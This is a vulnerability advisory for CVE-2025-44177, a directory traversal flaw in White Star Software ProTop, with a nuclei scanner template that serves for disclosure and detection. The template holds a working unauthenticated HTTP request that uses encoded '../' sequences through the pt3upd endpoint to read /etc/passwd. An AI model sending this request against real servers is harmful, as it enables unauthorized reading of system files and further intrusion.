White Star Software ProTop Directory Traversal Vulnerability

漏洞信息

漏洞名称： White Star Software ProTop Directory Traversal Vulnerability

漏洞编号：

• CVE： CVE-2025-44177

漏洞类型： 目录遍历

漏洞等级： 高危

漏洞描述： White Star Software ProTop是一款由White Star Software开发的软件产品，具体功能未在提供的信息中详细说明，但根据漏洞描述，它可能是一个网络服务或应用程序，部署在企业或个人的服务器上，用于提供特定的网络服务。此产品在特定版本中存在目录遍历漏洞，攻击者可以通过未授权的访问利用此漏洞。该漏洞的技术根源在于ProTop软件的pt3upd端点未对用户输入进行严格的验证和过滤，导致攻击者可以通过构造特殊的HTTP请求（如包含’../‘序列的路径）来遍历服务器文件系统，访问或下载敏感文件（如/etc/passwd）。这种漏洞的存在使得攻击者无需任何认证即可远程读取服务器上的任意文件，可能导致敏感信息泄露，进一步可能被用于其他攻击。由于此漏洞的利用不需要用户交互，且可以自动化执行，因此对受影响系统的安全构成了严重威胁。建议用户尽快升级到4.4.2-2024-11-27之后的版本以修复此漏洞。

产品厂商： White Star Software

产品名称： ProTop

影响版本： version <= 4.4.2-2024-11-27

来源： https://github.com/projectdiscovery/nuclei-templates/blob/f9a18da686668ee07a3709e525271c678e6764b0/http%2Fcves%2F2025%2FCVE-2025-44177.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: protop-dir-traversal

info:
  name: White Star Software ProTop - Directory Traversal
  author: s-cu-bot
  severity: high
  description: |
    This vulnerability allows unauthenticated directory traversal via the pt3upd endpoint.
  remediation: |
    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177
    - https://client.protop.co.za/
    - https://wss.com/
    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-44177
    cwe-id: CWE-22
    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: White Star Software
    product: Protop
  tags: cve, lfi, traversal, protop

http:
  - raw:
      - |
        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        name: LFI
        regex:
          - "root:.*:0:0:"